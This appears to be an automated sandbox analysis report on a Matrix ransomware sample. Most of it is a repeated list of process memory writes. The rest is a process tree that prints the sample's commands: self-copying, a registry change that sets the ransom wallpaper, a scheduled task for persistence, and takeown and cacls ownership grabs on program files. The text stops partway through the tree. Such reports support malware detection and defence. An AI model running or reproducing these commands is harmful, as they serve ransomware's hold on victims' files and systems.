d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1256 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1256 PID 1116 wrote to memory of 292 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1256 PID 292 wrote to memory of 1840 292 cmd.exe 1258 PID 292 wrote to memory of 1840 292 cmd.exe 1258 PID 292 wrote to memory of 1840 292 cmd.exe 1258 PID 292 wrote to memory of 1840 292 cmd.exe 1258 PID 292 wrote to memory of 224 292 cmd.exe 1259 PID 292 wrote to memory of 224 292 cmd.exe 1259 PID 292 wrote to memory of 224 292 cmd.exe 1259 PID 292 wrote to memory of 224 292 cmd.exe 1259 PID 292 wrote to memory of 1788 292 cmd.exe 1260 PID 292 wrote to memory of 1788 292 cmd.exe 1260 PID 292 wrote to memory of 1788 292 cmd.exe 1260 PID 292 wrote to memory of 1788 292 cmd.exe 1260 PID 1788 wrote to memory of 1428 1788 cmd.exe 1261 PID 1788 wrote to memory of 1428 1788 cmd.exe 1261 PID 1788 wrote to memory of 1428 1788 cmd.exe 1261 PID 1788 wrote to memory of 1428 1788 cmd.exe 1261 PID 292 wrote to memory of 220 292 cmd.exe 1262 PID 292 wrote to memory of 220 292 cmd.exe 1262 PID 292 wrote to memory of 220 292 cmd.exe 1262 PID 292 wrote to memory of 220 292 cmd.exe 1262 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1263 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1263 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1263 PID 1116 wrote to memory of 896 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1263 PID 896 wrote to memory of 1820 896 cmd.exe 1265 PID 896 wrote to memory of 1820 896 cmd.exe 1265 PID 896 wrote to memory of 1820 896 cmd.exe 1265 PID 896 wrote to memory of 1820 896 cmd.exe 1265 PID 896 wrote to memory of 1324 896 cmd.exe 1266 PID 896 wrote to memory of 1324 896 cmd.exe 1266 PID 896 wrote to memory of 1324 896 cmd.exe 1266 PID 896 wrote to memory of 1324 896 cmd.exe 1266 PID 896 wrote to memory of 1752 896 cmd.exe 1267 PID 896 wrote to memory of 1752 896 cmd.exe 1267 PID 896 wrote to memory of 1752 896 cmd.exe 1267 PID 896 wrote to memory of 1752 896 cmd.exe 1267 PID 1752 wrote to memory of 1168 1752 cmd.exe 1268 PID 1752 wrote to memory of 1168 1752 cmd.exe 1268 PID 1752 wrote to memory of 1168 1752 cmd.exe 1268 PID 1752 wrote to memory of 1168 1752 cmd.exe 1268 PID 896 wrote to memory of 1804 896 cmd.exe 1269 PID 896 wrote to memory of 1804 896 cmd.exe 1269 PID 896 wrote to memory of 1804 896 cmd.exe 1269 PID 896 wrote to memory of 1804 896 cmd.exe 1269 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1270 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1270 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1270 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1270 PID 1984 wrote to memory of 1948 1984 cmd.exe 1272 PID 1984 wrote to memory of 1948 1984 cmd.exe 1272 PID 1984 wrote to memory of 1948 1984 cmd.exe 1272 PID 1984 wrote to memory of 1948 1984 cmd.exe 1272 PID 1984 wrote to memory of 972 1984 cmd.exe 1273 PID 1984 wrote to memory of 972 1984 cmd.exe 1273 PID 1984 wrote to memory of 972 1984 cmd.exe 1273 PID 1984 wrote to memory of 972 1984 cmd.exe 1273 PID 1984 wrote to memory of 1468 1984 cmd.exe 1274 PID 1984 wrote to memory of 1468 1984 cmd.exe 1274 PID 1984 wrote to memory of 1468 1984 cmd.exe 1274 PID 1984 wrote to memory of 1468 1984 cmd.exe 1274 PID 1468 wrote to memory of 1080 1468 cmd.exe 1275 PID 1468 wrote to memory of 1080 1468 cmd.exe 1275 PID 1468 wrote to memory of 1080 1468 cmd.exe 1275 PID 1468 wrote to memory of 1080 1468 cmd.exe 1275 PID 1984 wrote to memory of 468 1984 cmd.exe 1276 PID 1984 wrote to memory of 468 1984 cmd.exe 1276 PID 1984 wrote to memory of 468 1984 cmd.exe 1276 PID 1984 wrote to memory of 468 1984 cmd.exe 1276 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1277 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1277 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1277 PID 1116 wrote to memory of 964 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1277 PID 964 wrote to memory of 1912 964 cmd.exe 1279 PID 964 wrote to memory of 1912 964 cmd.exe 1279 PID 964 wrote to memory of 1912 964 cmd.exe 1279 PID 964 wrote to memory of 1912 964 cmd.exe 1279 PID 964 wrote to memory of 280 964 cmd.exe 1280 PID 964 wrote to memory of 280 964 cmd.exe 1280 PID 964 wrote to memory of 280 964 cmd.exe 1280 PID 964 wrote to memory of 280 964 cmd.exe 1280 PID 964 wrote to memory of 484 964 cmd.exe 1281 PID 964 wrote to memory of 484 964 cmd.exe 1281 PID 964 wrote to memory of 484 964 cmd.exe 1281 PID 964 wrote to memory of 484 964 cmd.exe 1281 PID 484 wrote to memory of 1936 484 cmd.exe 1282 PID 484 wrote to memory of 1936 484 cmd.exe 1282 PID 484 wrote to memory of 1936 484 cmd.exe 1282 PID 484 wrote to memory of 1936 484 cmd.exe 1282 PID 964 wrote to memory of 1904 964 cmd.exe 1283 PID 964 wrote to memory of 1904 964 cmd.exe 1283 PID 964 wrote to memory of 1904 964 cmd.exe 1283 PID 964 wrote to memory of 1904 964 cmd.exe 1283 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1284 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1284 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1284 PID 1116 wrote to memory of 1820 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1284 PID 1820 wrote to memory of 1108 1820 cmd.exe 1286 PID 1820 wrote to memory of 1108 1820 cmd.exe 1286 PID 1820 wrote to memory of 1108 1820 cmd.exe 1286 PID 1820 wrote to memory of 1108 1820 cmd.exe 1286 PID 1820 wrote to memory of 1752 1820 cmd.exe 1287 PID 1820 wrote to memory of 1752 1820 cmd.exe 1287 PID 1820 wrote to memory of 1752 1820 cmd.exe 1287 PID 1820 wrote to memory of 1752 1820 cmd.exe 1287 PID 1820 wrote to memory of 212 1820 cmd.exe 1288 PID 1820 wrote to memory of 212 1820 cmd.exe 1288 PID 1820 wrote to memory of 212 1820 cmd.exe 1288 PID 1820 wrote to memory of 212 1820 cmd.exe 1288 PID 212 wrote to memory of 1780 212 cmd.exe 1289 PID 212 wrote to memory of 1780 212 cmd.exe 1289 PID 212 wrote to memory of 1780 212 cmd.exe 1289 PID 212 wrote to memory of 1780 212 cmd.exe 1289 PID 1820 wrote to memory of 1128 1820 cmd.exe 1290 PID 1820 wrote to memory of 1128 1820 cmd.exe 1290 PID 1820 wrote to memory of 1128 1820 cmd.exe 1290 PID 1820 wrote to memory of 1128 1820 cmd.exe 1290 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1291 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1291 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1291 PID 1116 wrote to memory of 1376 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1291 PID 1376 wrote to memory of 756 1376 cmd.exe 1293 PID 1376 wrote to memory of 756 1376 cmd.exe 1293 PID 1376 wrote to memory of 756 1376 cmd.exe 1293 PID 1376 wrote to memory of 756 1376 cmd.exe 1293 PID 1376 wrote to memory of 1528 1376 cmd.exe 1294 PID 1376 wrote to memory of 1528 1376 cmd.exe 1294 PID 1376 wrote to memory of 1528 1376 cmd.exe 1294 PID 1376 wrote to memory of 1528 1376 cmd.exe 1294 PID 1376 wrote to memory of 468 1376 cmd.exe 1295 PID 1376 wrote to memory of 468 1376 cmd.exe 1295 PID 1376 wrote to memory of 468 1376 cmd.exe 1295 PID 1376 wrote to memory of 468 1376 cmd.exe 1295 PID 468 wrote to memory of 1984 468 cmd.exe 1296 PID 468 wrote to memory of 1984 468 cmd.exe 1296 PID 468 wrote to memory of 1984 468 cmd.exe 1296 PID 468 wrote to memory of 1984 468 cmd.exe 1296 PID 1376 wrote to memory of 944 1376 cmd.exe 1297 PID 1376 wrote to memory of 944 1376 cmd.exe 1297 PID 1376 wrote to memory of 944 1376 cmd.exe 1297 PID 1376 wrote to memory of 944 1376 cmd.exe 1297 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1298 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1298 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1298 PID 1116 wrote to memory of 900 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1298 PID 900 wrote to memory of 1412 900 cmd.exe 1300 PID 900 wrote to memory of 1412 900 cmd.exe 1300 PID 900 wrote to memory of 1412 900 cmd.exe 1300 PID 900 wrote to memory of 1412 900 cmd.exe 1300 PID 900 wrote to memory of 1580 900 cmd.exe 1301 PID 900 wrote to memory of 1580 900 cmd.exe 1301 PID 900 wrote to memory of 1580 900 cmd.exe 1301 PID 900 wrote to memory of 1580 900 cmd.exe 1301 PID 900 wrote to memory of 1904 900 cmd.exe 1302 PID 900 wrote to memory of 1904 900 cmd.exe 1302 PID 900 wrote to memory of 1904 900 cmd.exe 1302 PID 900 wrote to memory of 1904 900 cmd.exe 1302 PID 1904 wrote to memory of 1800 1904 cmd.exe 1303 PID 1904 wrote to memory of 1800 1904 cmd.exe 1303 PID 1904 wrote to memory of 1800 1904 cmd.exe 1303 PID 1904 wrote to memory of 1800 1904 cmd.exe 1303 PID 900 wrote to memory of 1168 900 cmd.exe 1304 PID 900 wrote to memory of 1168 900 cmd.exe 1304 PID 900 wrote to memory of 1168 900 cmd.exe 1304 PID 900 wrote to memory of 1168 900 cmd.exe 1304 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1305 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1305 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1305 PID 1116 wrote to memory of 1772 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 1305 PID 1772 wrote to memory of 896 1772 cmd.exe 1307 PID 1772 wrote to memory of 896 1772 cmd.exe 1307 PID 1772 wrote to memory of 896 1772 cmd.exe 1307 PID 1772 wrote to memory of 896 1772 cmd.exe 1307 PID 1772 wrote to memory of 216 1772 cmd.exe 1308 PID 1772 wrote to memory of 216 1772 cmd.exe 1308 PID 1772 wrote to memory of 216 1772 cmd.exe 1308 PID 1772 wrote to memory of 216 1772 cmd.exe 1308 PID 1772 wrote to memory of 1128 1772 cmd.exe 1309 PID 1772 wrote to memory of 1128 1772 cmd.exe 1309 PID 1772 wrote to memory of 1128 1772 cmd.exe 1309 PID 1772 wrote to memory of 1128 1772 cmd.exe 1309 PID 1128 wrote to memory of 1324 1128 cmd.exe 1310 PID 1128 wrote to memory of 1324 1128 cmd.exe 1310 PID 1128 wrote to memory of 1324 1128 cmd.exe 1310 PID 1128 wrote to memory of 1324 1128 cmd.exe 1310 PID 1772 wrote to memory of 928 1772 cmd.exe 1311 PID 1772 wrote to memory of 928 1772 cmd.exe 1311 PID 1772 wrote to memory of 928 1772 cmd.exe 1311 PID 1772 wrote to memory of 928 1772 cmd.exe 1311
Processes
-
C:\Users\Admin\AppData\Local\Temp\d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe"C:\Users\Admin\AppData\Local\Temp\d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe" "C:\Users\Admin\AppData\Local\Temp\NWwlXAMT.exe"2⤵PID:1844
-
-
C:\Users\Admin\AppData\Local\Temp\NWwlXAMT.exe"C:\Users\Admin\AppData\Local\Temp\NWwlXAMT.exe" -n2⤵
- Executes dropped EXE
PID:1888
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\lU4Va4nk.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\lU4Va4nk.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:1612
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
PID:596
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Matrix Ransomware
- Modifies Control Panel
PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\klMjuRjL.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:296 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\klMjuRjL.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ruuoNhmf.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\ruuoNhmf.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:1236
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵PID:436
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:548
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵PID:1544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE64.exeIhR8G8EE.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""2⤵
- Loads dropped DLL
PID:1468 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf"3⤵
- Modifies file permissions
PID:1480
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "PDFSigQFormalRep.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""2⤵
- Loads dropped DLL
PID:1344 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C3⤵PID:972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"3⤵PID:300
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "DefaultID.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "DefaultID.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf""2⤵
- Loads dropped DLL
PID:596 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf" /E /G Admin:F /C3⤵PID:1904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf"3⤵
- Modifies file permissions
PID:1804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Dynamic.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Dynamic.pdf" -nobanner4⤵
- Executes dropped EXE
PID:928
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa""2⤵
- Loads dropped DLL
PID:296 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:1324
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:1312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "classes.jsa" -nobanner3⤵
- Loads dropped DLL
PID:972 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1632
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf""2⤵
- Loads dropped DLL
PID:1876 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf" /E /G Admin:F /C3⤵PID:1344
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf"3⤵PID:1908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "SignHere.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "SignHere.pdf" -nobanner4⤵
- Executes dropped EXE
PID:484
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""2⤵
- Loads dropped DLL
PID:680 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C3⤵PID:1468
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"3⤵PID:1892
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "StandardBusiness.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1984 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "StandardBusiness.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1512
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1128
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""2⤵
- Loads dropped DLL
PID:1816 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C3⤵PID:548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"3⤵PID:436
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "ENUtxt.pdf" -nobanner3⤵
- Loads dropped DLL
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "ENUtxt.pdf" -nobanner4⤵
- Executes dropped EXE
PID:1772
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵
- Loads dropped DLL
PID:1892 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Journal.exe" -nobanner3⤵
- Loads dropped DLL
PID:296 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Journal.exe" -nobanner4⤵
- Executes dropped EXE
PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵
- Loads dropped DLL
PID:972 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵
- Loads dropped DLL
PID:1236 -
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵
- Executes dropped EXE
PID:1752
-
-
-
C:\Users\Admin\AppData\Local\Temp\IhR8G8EE.exeIhR8G8EE.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\QKsEJSs2.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵
- Loads dropped DLL
PID:1840 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c IhR8G8EE.exe -accepteula "wabmig.exe" -nobanner3⤵
- Loads dropped DLL
PID:1564 -
